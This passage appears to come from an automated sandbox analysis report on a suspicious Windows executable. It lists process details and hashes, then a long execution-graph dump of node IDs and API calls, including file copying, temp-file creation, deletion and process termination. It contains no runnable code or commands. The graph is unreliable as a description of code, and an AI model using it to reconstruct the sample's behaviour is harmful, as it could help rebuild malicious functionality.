                Path:C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\lNaBNxiQmPpznOXIyTzZBKedADupcaOZlbDsYIcBFKRFrqOMkhaBd\IprrrFQGqOjAyLqOuuogohDyaEetb.exe"
                Imagebase:0x980000
                File size:140'800 bytes
                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                General

                Target ID:8
                Start time:22:26:34
                Start date:18/08/2024
                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                Imagebase:0x7ff6bf500000
                File size:676'768 bytes
                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:3.3%
                  Dynamic/Decrypted Code Coverage:0.4%
                  Signature Coverage:4.9%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:55
                  execution_graph 95238 402a00 95253 3bd7b0 ISource 95238->95253 95239 3bdb11 PeekMessageW 95239->95253 95240 3bd807 GetInputState 95240->95239 95240->95253 95241 401cbe TranslateAcceleratorW 95241->95253 95243 3bdb8f PeekMessageW 95243->95253 95244 3bda04 timeGetTime 95244->95253 95245 3bdb73 TranslateMessage DispatchMessageW 95245->95243 95246 3bdbaf Sleep 95260 3bdbc0 95246->95260 95247 402b74 Sleep 95247->95260 95248 401dda timeGetTime 95417 3ce300 23 API calls 95248->95417 95249 3ce551 timeGetTime 95249->95260 95252 402c0b GetExitCodeProcess 95257 402c21 WaitForSingleObject 95252->95257 95258 402c37 CloseHandle 95252->95258 95253->95239 95253->95240 95253->95241 95253->95243 95253->95244 95253->95245 95253->95246 95253->95247 95253->95248 95254 3bd9d5 95253->95254 95270 3bdd50 95253->95270 95277 3bdfd0 95253->95277 95300 3c1310 95253->95300 95358 3bbf40 95253->95358 95416 3cedf6 IsDialogMessageW GetClassLongW 95253->95416 95418 423a2a 23 API calls 95253->95418 95419 3bec40 95253->95419 95443 42359c 82 API calls __wsopen_s 95253->95443 95255 4429bf GetForegroundWindow 95255->95260 95257->95253 95257->95258 95258->95260 95259 402a31 95259->95254 95260->95249 95260->95252 95260->95253 95260->95254 95260->95255 95260->95259 95261 402ca9 Sleep 95260->95261 95444 435658 23 API calls 95260->95444 95445 41e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 95260->95445 95446 41d4dc 47 API calls 95260->95446 95261->95253 95271 3bdd6f 95270->95271 95272 3bdd83 95270->95272 95447 3bd260 239 API calls 2 library calls 95271->95447 95448 42359c 82 API calls __wsopen_s 95272->95448 95274 3bdd7a 95274->95253 95276 402f75 95276->95276 95278 3be010 95277->95278 95293 3be0dc ISource 95278->95293 95455 3d0242 5 API calls __Init_thread_wait 95278->95455 95281 42359c 82 API calls 95281->95293 95282 402fca 95282->95293 95456 3ba961 95282->95456 95283 3ba961 22 API calls 95283->95293 95289 402fee 95462 3d01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95289->95462 95293->95281 95293->95283 95295 3bec40 239 API calls 95293->95295 95296 3be3e1 95293->95296 95297 3c04f0 22 API calls 95293->95297 95449 3ba8c7 95293->95449 95453 3ba81b 41 API calls 95293->95453 95454 3ca308 239 API calls 95293->95454 95463 3d0242 5 API calls __Init_thread_wait 95293->95463 95464 3d00a3 29 API calls __onexit 95293->95464 95465 3d01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95293->95465 95466 4347d4 239 API calls 95293->95466 95467 4368c1 239 API calls 95293->95467 95295->95293 95296->95253 95297->95293 95301 3c1376 95300->95301 95302 3c17b0 95300->95302 95304 406331 95301->95304 95305 3c1390 95301->95305 95658 3d0242 5 API calls __Init_thread_wait 95302->95658 95669 43709c 239 API calls 95304->95669 95503 3c1940 95305->95503 95307 3c17ba 95316 3c17fb 95307->95316 95659 3b9cb3 95307->95659 95309 40633d 95309->95253 95312 3c1940 9 API calls 95313 3c13b6 95312->95313 95314 3c13ec 95313->95314 95313->95316 95315 406346 95314->95315 95340 3c1408 __fread_nolock 95314->95340 95670 42359c 82 API calls __wsopen_s 95315->95670 95316->95315 95317 3c182c 95316->95317 95666 3baceb 23 API calls ISource 95317->95666 95320 3c17d4 95665 3d01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95320->95665 95322 3c1839 95667 3cd217 239 API calls 95322->95667 95324 40636e 95671 42359c 82 API calls __wsopen_s 95324->95671 95325 3c152f 95327 3c153c 95325->95327 95328 4063d1 95325->95328 95330 3c1940 9 API calls 95327->95330 95673 435745 54 API calls _wcslen 95328->95673 95332 3c1549 95330->95332 95331 3cfddb 22 API calls 95331->95340 95335 4064fa 95332->95335 95336 3c1940 9 API calls 95332->95336 95333 3c1872 95668 3cfaeb 23 API calls 95333->95668 95334 3cfe0b 22 API calls 95334->95340 95344 406369 95335->95344 95674 42359c 82 API calls __wsopen_s 95335->95674 95342 3c1563 95336->95342 95339 3bec40 239 API calls 95339->95340 95340->95322 95340->95324 95340->95325 95340->95331 95340->95334 95340->95339 95341 4063b2 95340->95341 95340->95344 95672 42359c 82 API calls __wsopen_s 95341->95672 95342->95335 95345 3ba8c7 22 API calls 95342->95345 95347 3c15c7 ISource 95342->95347 95344->95253 95345->95347 95346 3c1940 9 API calls 95346->95347 95347->95333 95347->95335 95347->95344 95347->95346 95349 3c167b ISource 95347->95349 95513 43958b 95347->95513 95516 43d482 95347->95516 95556 426ef1 95347->95556 95636 3b4f39 95347->95636 95642 43959f 95347->95642 95645 41d4ce 95347->95645 95648 42f0ec 95347->95648 95348 3c171d 95348->95253 95349->95348 95657 3cce17 22 API calls ISource 95349->95657 96795 3badf0 95358->96795 95360 3bbf9d 95361 3bbfa9 95360->95361 95362 4004b6 95360->95362 95363 3bc01e 95361->95363 95364 4004c6 95361->95364 96814 42359c 82 API calls __wsopen_s 95362->96814 96800 3bac91 95363->96800 96815 42359c 82 API calls __wsopen_s 95364->96815 95368 3bc7da 95372 3cfe0b 22 API calls 95368->95372 95377 3bc808 __fread_nolock 95372->95377 95374 4004f5 95378 40055a 95374->95378 96816 3cd217 239 API calls 95374->96816 95383 3cfe0b 22 API calls 95377->95383 95415 3bc603 95378->95415 96817 42359c 82 API calls __wsopen_s 95378->96817 95379 3bec40 239 API calls 95401 3bc039 ISource __fread_nolock 95379->95401 95380 3baf8a 22 API calls 95380->95401 95381 417120 22 API calls 95381->95401 95382 40091a 96827 423209 23 API calls 95382->96827 95408 3bc350 ISource __fread_nolock 95383->95408 95386 4008a5 95387 3bec40 239 API calls 95386->95387 95389 4008cf 95387->95389 95389->95415 96825 3ba81b 41 API calls 95389->96825 95390 400591 96818 42359c 82 API calls __wsopen_s 95390->96818 95391 4008f6 96826 42359c 82 API calls __wsopen_s 95391->96826 95396 3bbbe0 40 API calls 95396->95401 95397 3bc3ac 95397->95253 95399 3cfddb 22 API calls 95399->95401 95400 3bc253 95405 400976 95400->95405 95410 3bc297 ISource 95400->95410 95401->95368 95401->95374 95401->95377 95401->95378 95401->95379 95401->95380 95401->95381 95401->95382 95401->95386 95401->95390 95401->95391 95401->95396 95401->95399 95402 3bc237 95401->95402 95403 3cfe0b 22 API calls 95401->95403 95409 4009bf 95401->95409 95401->95415 96804 3bad81 95401->96804 96819 417099 22 API calls __fread_nolock 95401->96819 96820 435745 54 API calls _wcslen 95401->96820 96821 3caa42 22 API calls ISource 95401->96821 96822 41f05c 40 API calls 95401->96822 96823 3ba993 41 API calls 95401->96823 96824 3baceb 23 API calls ISource 95401->96824 95402->95400 95404 3ba8c7 22 API calls 95402->95404 95403->95401 95404->95400 96828 3baceb 23 API calls ISource 95405->96828 95408->95397 96813 3cce17 22 API calls ISource 95408->96813 95409->95415 96829 42359c 82 API calls __wsopen_s 95409->96829 95410->95409 96811 3baceb 23 API calls ISource 95410->96811 95412 3bc335 95412->95409 95413 3bc342 95412->95413 96812 3ba704 22 API calls ISource 95413->96812 95415->95253 95416->95253 95417->95253 95418->95253 95425 3bec76 ISource 95419->95425 95420 3cfddb 22 API calls 95420->95425 95421 3d0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 95421->95425 95422 3d00a3 29 API calls pre_c_initialization 95422->95425 95423 3d01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 95423->95425 95424 404beb 96843 42359c 82 API calls __wsopen_s 95424->96843 95425->95420 95425->95421 95425->95422 95425->95423 95425->95424 95427 3bfef7 95425->95427 95429 404600 95425->95429 95430 3bed9d ISource 95425->95430 95431 404b0b 95425->95431 95432 3ba8c7 22 API calls 95425->95432 95438 3bfbe3 95425->95438 95439 3ba961 22 API calls 95425->95439 95442 3bf3ae ISource 95425->95442 96838 3c01e0 239 API calls 2 library calls 95425->96838 96839 3c06a0 41 API calls ISource 95425->96839 95427->95430 95433 3ba8c7 22 API calls 95427->95433 95429->95430 95436 3ba8c7 22 API calls 95429->95436 95430->95253 96841 42359c 82 API calls __wsopen_s 95431->96841 95432->95425 95433->95430 95436->95430 95438->95430 95440 404bdc 95438->95440 95438->95442 95439->95425 96842 42359c 82 API calls __wsopen_s 95440->96842 95442->95430 96840 42359c 82 API calls __wsopen_s 95442->96840 95443->95253 95444->95260 95445->95260 95446->95260 95447->95274 95448->95276 95450 3ba8ea __fread_nolock 95449->95450 95451 3ba8db 95449->95451 95450->95293 95451->95450 95468 3cfe0b 95451->95468 95453->95293 95454->95293 95455->95282 95457 3cfe0b 22 API calls 95456->95457 95458 3ba976 95457->95458 95490 3cfddb 95458->95490 95460 3ba984 95461 3d00a3 29 API calls __onexit 95460->95461 95461->95289 95462->95293 95463->95293 95464->95293 95465->95293 95466->95293 95467->95293 95470 3cfddb 95468->95470 95471 3cfdfa 95470->95471 95474 3cfdfc 95470->95474 95478 3dea0c 95470->95478 95485 3d4ead 7 API calls 2 library calls 95470->95485 95471->95450 95473 3d066d 95487 3d32a4 RaiseException 95473->95487 95474->95473 95486 3d32a4 RaiseException 95474->95486 95477 3d068a 95477->95450 95483 3e3820 __FrameHandler3::FrameUnwindToState 95478->95483 95479 3e385e 95489 3df2d9 20 API calls __dosmaperr 95479->95489 95481 3e3849 RtlAllocateHeap 95482 3e385c 95481->95482 95481->95483 95482->95470 95483->95479 95483->95481 95488 3d4ead 7 API calls 2 library calls 95483->95488 95485->95470 95486->95473 95487->95477 95488->95483 95489->95482 95493 3cfde0 95490->95493 95491 3dea0c ___std_exception_copy 21 API calls 95491->95493 95492 3cfdfa 95492->95460 95493->95491 95493->95492 95496 3cfdfc 95493->95496 95500 3d4ead 7 API calls 2 library calls 95493->95500 95495 3d066d 95502 3d32a4 RaiseException 95495->95502 95496->95495 95501 3d32a4 RaiseException 95496->95501 95499 3d068a 95499->95460 95500->95493 95501->95495 95502->95499 95504 3c195d 95503->95504 95505 3c1981 95503->95505 95512 3c13a0 95504->95512 95677 3d0242 5 API calls __Init_thread_wait 95504->95677 95675 3d0242 5 API calls __Init_thread_wait 95505->95675 95507 3c198b 95507->95504 95676 3d01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95507->95676 95510 3c8727 95510->95512 95678 3d01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 95510->95678 95512->95312 95679 437f59 95513->95679 95515 43959b 95515->95347 95822 421e96 95516->95822 95518 43d49d 95519 43d4b1 95518->95519 95520 43d4ee 95518->95520 95857 3b9c6e 22 API calls 95519->95857 95523 43d4fc 95520->95523 95858 3bb567 39 API calls 95520->95858 95524 43d548 95523->95524 95525 43d51f 95523->95525 95527 43d600 95524->95527 95530 43d55a 95524->95530 95859 3b9c6e 22 API calls 95525->95859 95826 3cf1d8 95527->95826 95529 43d4be 95529->95347 95531 43d55f 95530->95531 95532 43d59d 95530->95532 95534 3b6270 22 API calls 95531->95534 95535 3cfe0b 22 API calls 95532->95535 95537 43d572 95534->95537 95538 43d5a3 95535->95538 95860 3b6e90 95537->95860 95544 3b6270 22 API calls 95538->95544 95539 43d619 95844 3b6270 95539->95844 95542 43d582 95872 3b62b5 22 API calls 95542->95872 95545 43d5dd 95544->95545 95549 3b6e90 22 API calls 95545->95549 95547 43d630 95849 3b6d9e MultiByteToWideChar 95547->95849 95548 43d637 95874 3b6e14 24 API calls 95548->95874 95553 43d5ea 95549->95553 95552 43d635 95875 3b62b5 22 API calls 95552->95875 95873 3b62b5 22 API calls 95553->95873 95557 3ba961 22 API calls 95556->95557 95558 426f1d 95557->95558 95559 3ba961 22 API calls 95558->95559 95560 426f26 95559->95560 95561 426f3a 95560->95561 96071 3bb567 39 API calls 95560->96071 95563 3b7510 53 API calls 95561->95563 95566 426f57 _wcslen 95563->95566 95564 4270bf 95886 3b4ecb 95564->95886 95565 426fbc 95567 3b7510 53 API calls 95565->95567 95566->95564 95566->95565 95635 4270e9 95566->95635 95569 426fc8 95567->95569 95573 3ba8c7 22 API calls 95569->95573 95578 426fdb 95569->95578 95571 4270e5 95572 3ba961 22 API calls 95571->95572 95571->95635 95575 42711a 95572->95575 95573->95578 95574 3b4ecb 94 API calls 95574->95571 95576 3ba961 22 API calls 95575->95576 95580 427126 95576->95580 95577 427027 95579 3b7510 53 API calls 95577->95579 95578->95577 95581 427005 95578->95581 95585 3ba8c7 22 API calls 95578->95585 95583 427034 95579->95583 95584 3ba961 22 API calls 95580->95584 96072 3b33c6 95581->96072 95587 427047 95583->95587 95588 42703d 95583->95588 95589 42712f 95584->95589 95585->95581 95586 42700f 95590 3b7510 53 API calls 95586->95590 96081 41e199 GetFileAttributesW 95587->96081 95591 3ba8c7 22 API calls 95588->95591 95593 3ba961 22 API calls 95589->95593 95594 42701b 95590->95594 95591->95587 95596 427138 95593->95596 95597 3b6350 22 API calls 95594->95597 95595 427050 95598 427063 95595->95598 95601 3b4c6d 22 API calls 95595->95601 95599 3b7510 53 API calls 95596->95599 95597->95577 95600 3b7510 53 API calls 95598->95600 95608 427069 95598->95608 95602 427145 95599->95602 95604 4270a0 95600->95604 95601->95598 95908 3b525f 95602->95908 96082 41d076 57 API calls 95604->96082 95605 427166 95950 3b4c6d 95605->95950 95608->95635 95610 4271a9 95612 3ba8c7 22 API calls 95610->95612 95611 3b4c6d 22 API calls 95613 427186 95611->95613 95614 4271ba 95612->95614 95613->95610 96083 3b6b57 95613->96083 95953 3b6350 95614->95953 95618 3b6350 22 API calls 95620 4271d6 95618->95620 95619 42719b 95621 3b6b57 22 API calls 95619->95621 95622 3b6350 22 API calls 95620->95622 95621->95610 95623 4271e4 95622->95623 95624 3b7510 53 API calls 95623->95624 95625 4271f0 95624->95625 95962 41d7bc 95625->95962 95627 427201 95628 41d4ce 4 API calls 95627->95628 95629 42720b 95628->95629 95630 3b7510 53 API calls 95629->95630 95633 427239 95629->95633 95631 427229 95630->95631 96016 422947 95631->96016 95634 3b4f39 68 API calls 95633->95634 95634->95635 95635->95347 95637 3b4f43 95636->95637 95639 3b4f4a 95636->95639 95638 3de678 67 API calls 95637->95638 95638->95639 95640 3b4f6a FreeLibrary 95639->95640 95641 3b4f59 95639->95641 95640->95641 95641->95347 95643 437f59 120 API calls 95642->95643 95644 4395af 95643->95644 95644->95347 96746 41dbbe lstrlenW 95645->96746 95649 3b7510 53 API calls 95648->95649 95650 42f126 95649->95650 96751 3b9e90 95650->96751 95652 42f136 95653 42f15b 95652->95653 95654 3bec40 239 API calls 95652->95654 95656 42f15f 95653->95656 96779 3b9c6e 22 API calls 95653->96779 95654->95653 95656->95347 95657->95349 95658->95307 95660 3b9cc2 _wcslen 95659->95660 95661 3cfe0b 22 API calls 95660->95661 95662 3b9cea __fread_nolock 95661->95662 95663 3cfddb 22 API calls 95662->95663 95664 3b9d00 95663->95664 95664->95320 95665->95316 95666->95322 95667->95333 95668->95333 95669->95309 95670->95344 95671->95344 95672->95344 95673->95342 95674->95344 95675->95507 95676->95504 95677->95510 95678->95512 95717 3b7510 95679->95717 95683 43844f 95781 438ee4 60 API calls 95683->95781 95686 43845e 95687 43828f 95686->95687 95688 43846a 95686->95688 95753 437e86 95687->95753 95697 437fd5 ISource 95688->95697 95689 3b7510 53 API calls 95707 438049 95689->95707 95694 4382c8 95768 3cfc70 95694->95768 95697->95515 95698 438302 95775 3b63eb 22 API calls 95698->95775 95699 4382e8 95774 42359c 82 API calls __wsopen_s 95699->95774 95702 4382f3 GetCurrentProcess TerminateProcess 95702->95698 95703 438281 95703->95683 95703->95687 95704 438311 95776 3b6a50 22 API calls 95704->95776 95706 43832a 95716 438352 95706->95716 95777 3c04f0 22 API calls 95706->95777 95707->95689 95707->95697 95707->95703 95772 41417d 22 API calls __fread_nolock 95707->95772 95773 43851d 42 API calls _strftime 95707->95773 95708 4384c5 95708->95697 95712 4384d9 FreeLibrary 95708->95712 95710 438341 95778 438b7b 75 API calls 95710->95778 95712->95697 95716->95708 95779 3c04f0 22 API calls 95716->95779 95780 3baceb 23 API calls ISource 95716->95780 95782 438b7b 75 API calls 95716->95782 95718 3b7522 95717->95718 95719 3b7525 95717->95719 95718->95697 95740 438cd3 95718->95740 95720 3b755b 95719->95720 95721 3b752d 95719->95721 95723 3f50f6 95720->95723 95726 3b756d 95720->95726 95731 3f500f 95720->95731 95783 3d51c6 26 API calls 95721->95783 95786 3d5183 26 API calls 95723->95786 95724 3b753d 95730 3cfddb 22 API calls 95724->95730 95784 3cfb21 51 API calls 95726->95784 95727 3f510e 95727->95727 95732 3b7547 95730->95732 95734 3cfe0b 22 API calls 95731->95734 95739 3f5088 95731->95739 95733 3b9cb3 22 API calls 95732->95733 95733->95718 95735 3f5058 95734->95735 95736 3cfddb 22 API calls 95735->95736 95737 3f507f 95736->95737 95738 3b9cb3 22 API calls 95737->95738 95738->95739 95785 3cfb21 51 API calls 95739->95785 95787 3baec9 95740->95787 95742 438cee CharLowerBuffW 95793 418e54 95742->95793 95746 3ba961 22 API calls 95747 438d2a 95746->95747 95800 3b6d25 95747->95800 95749 438d3e 95813 3b93b2 95749->95813 95751 438e5e _wcslen 95751->95707 95752 438d48 _wcslen 95752->95751 95817 43851d 42 API calls _strftime 95752->95817 95754 437ea1 95753->95754 95755 437eec 95753->95755 95756 3cfe0b 22 API calls 95754->95756 95759 439096 95755->95759 95757 437ec3 95756->95757 95757->95755 95758 3cfddb 22 API calls 95757->95758 95758->95757 95760 4392ab ISource 95759->95760 95767 4390ba _strcat _wcslen 95759->95767 95760->95694 95761 3bb6b5 39 API calls 95761->95767 95762 3bb567 39 API calls 95762->95767 95763 3bb38f 39 API calls 95763->95767 95764 3b7510 53 API calls 95764->95767 95765 3dea0c 21 API calls ___std_exception_copy 95765->95767 95767->95760 95767->95761 95767->95762 95767->95763 95767->95764 95767->95765 95821 41efae 24 API calls _wcslen 95767->95821 95770 3cfc85 95768->95770 95769 3cfd1d VirtualAlloc 95771 3cfceb 95769->95771 95770->95769 95770->95771 95771->95698 95771->95699 95772->95707 95773->95707 95774->95702 95775->95704 95776->95706 95777->95710 95778->95716 95779->95716 95780->95716 95781->95686 95782->95716 95783->95724 95784->95724 95785->95723 95786->95727 95788 3baed9 __fread_nolock 95787->95788 95789 3baedc 95787->95789 95788->95742 95790 3cfddb 22 API calls 95789->95790 95791 3baee7 95790->95791 95792 3cfe0b 22 API calls 95791->95792 95792->95788 95794 418e74 _wcslen 95793->95794 95796 418ea9 95794->95796 95798 418f68 95794->95798 95799 418f63 95794->95799 95796->95799 95818 3cce60 41 API calls 95796->95818 95798->95799 95819 3cce60 41 API calls 95798->95819 95799->95746 95799->95752 95801 3b6d91 95800->95801 95802 3b6d34 95800->95802 95804 3b93b2 22 API calls 95801->95804 95802->95801 95803 3b6d3f 95802->95803 95805 3b6d5a 95803->95805 95806 3f4c9d 95803->95806 95809 3b6d62 __fread_nolock 95804->95809 95820 3b6f34 22 API calls 95805->95820 95808 3cfddb 22 API calls 95806->95808 95810 3f4ca7 95808->95810 95809->95749 95811 3cfe0b 22 API calls 95810->95811 95812 3f4cda 95811->95812 95814 3b93c9 __fread_nolock 95813->95814 95815 3b93c0 95813->95815 95814->95752 95815->95814 95816 3baec9 22 API calls 95815->95816 95816->95814 95817->95751 95818->95796 95819->95798 95820->95809 95821->95767 95823 421ea4 95822->95823 95824 421e9f 95822->95824 95823->95518 95876 420f67 24 API calls __fread_nolock 95824->95876 95827 3cfe0b 22 API calls 95826->95827 95828 3cf1ef 95827->95828 95829 3cfddb 22 API calls 95828->95829 95830 3cf1fb 95829->95830 95831 3cf733 95830->95831 95832 3cf77f 95831->95832 95833 3cf741 95831->95833 95878 41ca5b 22 API calls __fread_nolock 95832->95878 95833->95832 95835 3cf74c 95833->95835 95836 3cf75a 95835->95836 95837 40f2fe 95835->95837 95877 3cf788 22 API calls 95836->95877 95839 3cfddb 22 API calls 95837->95839 95841 40f308 95839->95841 95840 3cf762 __fread_nolock 95840->95539 95842 3cfe0b 22 API calls 95841->95842 95843 40f32d 95842->95843 95845 3cfe0b 22 API calls 95844->95845 95846 3b6295 95845->95846 95847 3cfddb 22 API calls 95846->95847 95848 3b62a3 95847->95848 95848->95547 95848->95548 95850 3b6e0b 95849->95850 95851 3b6dc7 95849->95851 95879 3ba6c3 95850->95879 95852 3cfe0b 22 API calls 95851->95852 95854 3b6ddc MultiByteToWideChar 95852->95854 95855 3b6e90 22 API calls 95854->95855 95856 3b6dff 95855->95856 95856->95552 95857->95529 95858->95523 95859->95529 95861 3b6ea3 95860->95861 95862 3b6f24 95860->95862 95861->95862 95864 3b6eaf 95861->95864 95863 3b93b2 22 API calls 95862->95863 95865 3b6ec1 __fread_nolock 95863->95865 95866 3b6eb9 95864->95866 95867 3b6ee7 95864->95867 95865->95542 95885 3b6f34 22 API calls 95866->95885 95868 3cfddb 22 API calls 95867->95868 95870 3b6ef1 95868->95870 95871 3cfe0b 22 API calls 95870->95871 95871->95865 95872->95529 95873->95529 95874->95552 95875->95529 95876->95823 95877->95840 95878->95840 95880 3ba6dd 95879->95880 95881 3ba6d0 95879->95881 95882 3cfddb 22 API calls 95880->95882 95881->95856 95883 3ba6e7 95882->95883 95884 3cfe0b 22 API calls 95883->95884 95884->95881 95885->95865 96095 3b4e90 LoadLibraryA 95886->96095 95891 3f3ccf 95893 3b4f39 68 API calls 95891->95893 95892 3b4ef6 LoadLibraryExW 96103 3b4e59 LoadLibraryA 95892->96103 95895 3f3cd6 95893->95895 95897 3b4e59 3 API calls 95895->95897 95899 3f3cde 95897->95899 96125 3b50f5 95899->96125 95900 3b4f20 95900->95899 95901 3b4f2c 95900->95901 95902 3b4f39 68 API calls 95901->95902 95904 3b4f31 95902->95904 95904->95571 95904->95574 95907 3f3d05 95909 3ba961 22 API calls 95908->95909 95910 3b5275 95909->95910 95911 3ba961 22 API calls 95910->95911 95912 3b527d 95911->95912 95913 3ba961 22 API calls 95912->95913 95914 3b5285 95913->95914 95915 3ba961 22 API calls 95914->95915 95916 3b528d 95915->95916 95917 3f3df5 95916->95917 95918 3b52c1 95916->95918 95919 3ba8c7 22 API calls 95917->95919 95920 3b6d25 22 API calls 95918->95920 95921 3f3dfe 95919->95921 95922 3b52cf 95920->95922 95923 3ba6c3 22 API calls 95921->95923 95924 3b93b2 22 API calls 95922->95924 95926 3b5304 95923->95926 95925 3b52d9 95924->95925 95925->95926 95927 3b6d25 22 API calls 95925->95927 95928 3b5349 95926->95928 95929 3b5325 95926->95929 95945 3f3e20 95926->95945 95931 3b52fa 95927->95931 95930 3b6d25 22 API calls 95928->95930 95929->95928 95935 3b4c6d 22 API calls 95929->95935 95932 3b535a 95930->95932 95933 3b93b2 22 API calls 95931->95933 95934 3b5370 95932->95934 95939 3ba8c7 22 API calls 95932->95939 95933->95926 95936 3b5384 95934->95936 95941 3ba8c7 22 API calls 95934->95941 95937 3b5332 95935->95937 95940 3b538f 95936->95940 95943 3ba8c7 22 API calls 95936->95943 95937->95928 95942 3b6d25 22 API calls 95937->95942 95938 3b6b57 22 API calls 95947 3f3ee0 95938->95947 95939->95934 95944 3ba8c7 22 API calls 95940->95944 95948 3b539a 95940->95948 95941->95936 95942->95928 95943->95940 95944->95948 95945->95938 95946 3b4c6d 22 API calls 95946->95947 95947->95928 95947->95946 96389 3b49bd 22 API calls __fread_nolock 95947->96389 95948->95605 95951 3baec9 22 API calls 95950->95951 95952 3b4c78 95951->95952 95952->95610 95952->95611 95954 3b6362 95953->95954 95955 3f4a51 95953->95955 96390 3b6373 95954->96390 96400 3b4a88 22 API calls __fread_nolock 95955->96400 95958 3b636e 95958->95618 95959 3f4a5b 95960 3f4a67 95959->95960 95961 3ba8c7 22 API calls 95959->95961 95961->95960 95963 41d7d8 95962->95963 95964 41d7f3 95963->95964 95965 41d7dd 95963->95965 95966 3ba961 22 API calls 95964->95966 95968 3ba8c7 22 API calls 95965->95968 96015 41d7ee 95965->96015 95967 41d7fb 95966->95967 95969 3ba961 22 API calls 95967->95969 95968->96015 95970 41d803 95969->95970 95971 3ba961 22 API calls 95970->95971 95972 41d80e 95971->95972 95973 3ba961 22 API calls 95972->95973 95974 41d816 95973->95974 95975 3ba961 22 API calls 95974->95975 95976 41d81e 95975->95976 95977 3ba961 22 API calls 95976->95977 95978 41d826 95977->95978 95979 3ba961 22 API calls 95978->95979 95980 41d82e 95979->95980 95981 3ba961 22 API calls 95980->95981 95982 41d836 95981->95982 95983 3b525f 22 API calls 95982->95983 95984 41d84d 95983->95984 95985 3b525f 22 API calls 95984->95985 95986 41d866 95985->95986 95987 3b4c6d 22 API calls 95986->95987 95989 41d872 95987->95989 95988 41d885 95991 3b4c6d 22 API calls 95988->95991 95989->95988 95990 3b93b2 22 API calls 95989->95990 95990->95988 95992 41d88e 95991->95992 95993 41d89e 95992->95993 95994 3b93b2 22 API calls 95992->95994 95995 41d8b0 95993->95995 95997 3ba8c7 22 API calls 95993->95997 95994->95993 95996 3b6350 22 API calls 95995->95996 95998 41d8bb 95996->95998 95997->95995 96406 41d978 22 API calls 95998->96406 96000 41d8ca 96407 41d978 22 API calls 96000->96407 96002 41d8dd 96003 3b4c6d 22 API calls 96002->96003 96004 41d8e7 96003->96004 96005 41d8ec 96004->96005 96006 41d8fe 96004->96006 96007 3b33c6 22 API calls 96005->96007 96008 3b4c6d 22 API calls 96006->96008 96009 41d8f9 96007->96009 96010 41d907 96008->96010 96013 3b6350 22 API calls 96009->96013 96011 41d925 96010->96011 96012 3b33c6 22 API calls 96010->96012 96014 3b6350 22 API calls 96011->96014 96012->96009 96013->96011 96014->96015 96015->95627 96017 422954 __wsopen_s 96016->96017 96018 3cfe0b 22 API calls 96017->96018 96019 422971 96018->96019 96020 3b5722 22 API calls 96019->96020 96021 42297b 96020->96021 96022 42274e 27 API calls 96021->96022 96023 422986 96022->96023 96024 3b511f 64 API calls 96023->96024 96025 42299b 96024->96025 96026 4229bf 96025->96026 96027 422a6c 96025->96027 96434 422e66 96026->96434 96029 422e66 75 API calls 96027->96029 96044 422a38 96029->96044 96032 3b50f5 40 API calls 96033 422a91 96032->96033 96034 3b50f5 40 API calls 96033->96034 96037 422aa1 96034->96037 96035 422a75 ISource 96035->95633 96036 4229ed 96441 3dd583 26 API calls 96036->96441 96038 3b50f5 40 API calls 96037->96038 96040 422abc 96038->96040 96041 3b50f5 40 API calls 96040->96041 96042 422acc 96041->96042 96043 3b50f5 40 API calls 96042->96043 96045 422ae7 96043->96045 96044->96032 96044->96035 96046 3b50f5 40 API calls 96045->96046 96047 422af7 96046->96047 96048 3b50f5 40 API calls 96047->96048 96049 422b07 96048->96049 96050 3b50f5 40 API calls 96049->96050 96051 422b17 96050->96051 96408 423017 GetTempPathW GetTempFileNameW 96051->96408 96053 422b22 96054 3de5eb 29 API calls 96053->96054 96065 422b33 96054->96065 96055 422bed 96418 3de678 96055->96418 96057 422bf8 96059 422c12 96057->96059 96060 422bfe DeleteFileW 96057->96060 96058 3b50f5 40 API calls 96058->96065 96061 422c91 CopyFileW 96059->96061 96067 422c18 96059->96067 96060->96035 96062 422ca7 DeleteFileW 96061->96062 96063 422cb9 DeleteFileW 96061->96063 96062->96035 96431 422fd8 CreateFileW 96063->96431 96065->96035 96065->96055 96065->96058 96409 3ddbb3 96065->96409 96442 4222ce 96067->96442 96070 422c80 DeleteFileW 96070->96035 96071->95561 96073 3f30bb 96072->96073 96074 3b33dd 96072->96074 96076 3cfddb 22 API calls 96073->96076 96735 3b33ee 96074->96735 96078 3f30c5 _wcslen 96076->96078 96077 3b33e8 96077->95586 96079 3cfe0b 22 API calls 96078->96079 96080 3f30fe __fread_nolock 96079->96080 96081->95595 96082->95608 96084 3b6b67 _wcslen 96083->96084 96085 3f4ba1 96083->96085 96088 3b6b7d 96084->96088 96089 3b6ba2 96084->96089 96086 3b93b2 22 API calls 96085->96086 96087 3f4baa 96086->96087 96087->96087 96745 3b6f34 22 API calls 96088->96745 96090 3cfddb 22 API calls 96089->96090 96092 3b6bae 96090->96092 96094 3cfe0b 22 API calls 96092->96094 96093 3b6b85 __fread_nolock 96093->95619 96094->96093 96096 3b4ea8 GetProcAddress 96095->96096 96097 3b4ec6 96095->96097 96098 3b4eb8 96096->96098 96100 3de5eb 96097->96100 96098->96097 96099 3b4ebf FreeLibrary 96098->96099 96099->96097 96133 3de52a 96100->96133 96102 3b4eea 96102->95891 96102->95892 96104 3b4e6e GetProcAddress 96103->96104 